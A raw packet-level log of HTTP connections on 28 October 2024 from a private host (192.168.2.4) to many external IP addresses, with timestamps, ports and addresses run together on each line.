                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.845853090 CET8049740172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.845884085 CET8049740172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:11.503525019 CET8049740172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:11.503628969 CET4974080192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:11.503825903 CET4974080192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:11.509156942 CET8049740172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:11.628998995 CET4974180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:11.634530067 CET804974118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:11.635051966 CET4974180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:11.635205984 CET4974180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:11.635219097 CET4974180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:11.640495062 CET804974118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:11.640506983 CET804974118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:13.057900906 CET804974118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:13.068227053 CET4974180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:13.074338913 CET804974118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:13.074758053 CET4974180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:13.312128067 CET4974280192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:13.317590952 CET804974282.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:13.317717075 CET4974280192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:13.318017960 CET4974280192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:13.318042040 CET4974280192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:13.323528051 CET804974282.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:13.323574066 CET804974282.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:21.805856943 CET804974282.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:21.806022882 CET4974280192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:21.806813002 CET4974280192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.150809050 CET4975780192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.150809050 CET4975780192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.156232119 CET8049757172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.156567097 CET8049757172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.823122025 CET8049757172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.823199034 CET4975780192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.823262930 CET4975780192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.828737974 CET8049757172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.965039015 CET4975880192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.970670938 CET804975834.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.970789909 CET4975880192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.970911026 CET4975880192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.970940113 CET4975880192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.976537943 CET804975834.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.976598024 CET804975834.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:41.938535929 CET804975834.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:41.939357996 CET4975880192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:41.945743084 CET804975834.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:41.945869923 CET4975880192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.093286037 CET4975980192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.098752975 CET804975918.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.098891973 CET4975980192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.098999023 CET4975980192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.099028111 CET4975980192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.104356050 CET804975918.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.104372025 CET804975918.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.759949923 CET804975918.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.760196924 CET4975980192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.766102076 CET804975918.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.766194105 CET4975980192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.896640062 CET4976080192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.902404070 CET8049760208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.902513981 CET4976080192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.902729034 CET4976080192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.902765989 CET4976080192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.908435106 CET8049760208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.908458948 CET8049760208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.534274101 CET8049760208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.555001020 CET4976080192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.555073023 CET4976080192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.560638905 CET8049760208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.560714960 CET8049760208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.699248075 CET8049760208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.746908903 CET4976080192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.944057941 CET4976180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.949652910 CET804976113.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.949781895 CET4976180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.963346004 CET4976180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.963610888 CET4976180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.971839905 CET804976113.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.971858978 CET804976113.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:45.398087025 CET804976113.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:45.399324894 CET4976180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:45.405653000 CET804976113.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:45.405719995 CET4976180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:45.548485994 CET4976280192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:45.554044962 CET804976244.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:45.554155111 CET4976280192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:45.554348946 CET4976280192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:45.554375887 CET4976280192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:45.559851885 CET804976244.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:45.559926033 CET804976244.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:46.224875927 CET804976244.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:54.126198053 CET4976980192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:54.126360893 CET4976980192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:54.126410007 CET4976980192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:54.131742954 CET804976934.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:54.132050991 CET804976934.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:55.174616098 CET804976934.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:55.174926996 CET4976980192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:55.175017118 CET804976934.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:55.175033092 CET804976934.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:55.175065994 CET4976980192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:55.175081968 CET4976980192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:55.180532932 CET804976934.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:55.385205984 CET4977080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:55.390925884 CET804977054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:55.391011000 CET4977080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:55.391169071 CET4977080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:55.391195059 CET4977080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:55.396836996 CET804977054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:55.396867990 CET804977054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:56.247502089 CET804977054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:56.248697042 CET4977080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:56.254473925 CET804977054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:56.254816055 CET4977080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:56.432806969 CET4977180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:56.438376904 CET804977118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:56.438452959 CET4977180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:56.448688030 CET4977180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:56.448709965 CET4977180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:56.454179049 CET804977118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:56.454196930 CET804977118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:57.995876074 CET804977118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:57.996067047 CET4977180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.002501965 CET804977118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.003628016 CET4977180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.287672043 CET4977280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.293245077 CET804977218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.293332100 CET4977280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.293490887 CET4977280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.293512106 CET4977280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.298871994 CET804977218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.298930883 CET804977218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.948283911 CET804977218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.948496103 CET4977280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.954353094 CET804977218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.954444885 CET4977280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:59.162934065 CET4977480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:59.168488979 CET804977444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:59.168562889 CET4977480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:59.168756008 CET4977480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:59.168903112 CET4977480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:59.174047947 CET804977444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:59.174189091 CET804977444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:59.839534998 CET804977444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:59.839715958 CET4977480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:59.845865965 CET804977444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:59.845951080 CET4977480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:00.186892986 CET4977680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:00.192472935 CET804977618.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:00.192570925 CET4977680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:00.192723036 CET4977680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:00.192749977 CET4977680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:00.198220968 CET804977618.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:00.198460102 CET804977618.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:12.594398975 CET4985080192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:12.594521999 CET4985080192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:12.594521999 CET4985080192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:12.599940062 CET804985034.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:12.599972010 CET804985034.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:13.437880993 CET804985034.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:13.481380939 CET4985080192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:13.498076916 CET4985080192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:13.503761053 CET804985034.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:13.503854990 CET4985080192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:14.034213066 CET4985780192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:14.039508104 CET80498573.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:14.039571047 CET4985780192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:14.039732933 CET4985780192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:14.039758921 CET4985780192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:14.045017004 CET80498573.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:14.045028925 CET80498573.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:14.703419924 CET80498573.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:14.703598022 CET4985780192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:14.709664106 CET80498573.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:14.709724903 CET4985780192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:15.064135075 CET4986680192.168.2.418.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:15.069546938 CET804986618.246.231.120192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:15.069627047 CET4986680192.168.2.418.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:15.069752932 CET4986680192.168.2.418.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:15.069777966 CET4986680192.168.2.418.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:15.075110912 CET804986618.246.231.120192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:15.075202942 CET804986618.246.231.120192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:15.892615080 CET804986618.246.231.120192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:15.892800093 CET4986680192.168.2.418.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:15.898761988 CET804986618.246.231.120192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:15.898822069 CET4986680192.168.2.418.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:16.096292973 CET4987380192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:16.102375031 CET80498733.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:16.102459908 CET4987380192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:16.102674961 CET4987380192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:16.102737904 CET4987380192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:16.108623028 CET80498733.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:16.108969927 CET80498733.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:17.058840036 CET80498733.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:17.059036016 CET4987380192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:17.064872980 CET80498733.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:17.065207958 CET4987380192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:17.609294891 CET4988180192.168.2.485.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:17.863715887 CET804988185.214.228.140192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:17.863811016 CET4988180192.168.2.485.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:17.865041971 CET4988180192.168.2.485.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:17.865092993 CET4988180192.168.2.485.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:17.870496988 CET804988185.214.228.140192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:17.870570898 CET804988185.214.228.140192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:18.749891043 CET804988185.214.228.140192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:18.750019073 CET804988185.214.228.140192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:18.750401974 CET4988180192.168.2.485.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:18.967185974 CET4988980192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:18.972676992 CET804988947.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:18.972781897 CET4988980192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:18.973161936 CET4988980192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:18.973196983 CET4988980192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:18.978617907 CET804988947.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:18.978632927 CET804988947.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:20.549344063 CET804988947.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:20.550820112 CET4988980192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:20.556490898 CET804988947.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:29.232007980 CET804994118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:29.250405073 CET4994180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:29.257112026 CET804994118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:29.257174015 CET4994180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:29.283086061 CET4995280192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:29.288520098 CET804995213.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:29.288605928 CET4995280192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:29.288954973 CET4995280192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:29.288985968 CET4995280192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:29.294871092 CET804995213.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:29.294910908 CET804995213.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:30.746256113 CET804995213.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:30.777173042 CET4995280192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:30.783252954 CET804995213.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:30.783318043 CET4995280192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.010749102 CET4996180192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.016396999 CET804996118.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.016474009 CET4996180192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.016619921 CET4996180192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.016639948 CET4996180192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.022010088 CET804996118.208.156.248192.168.2.4
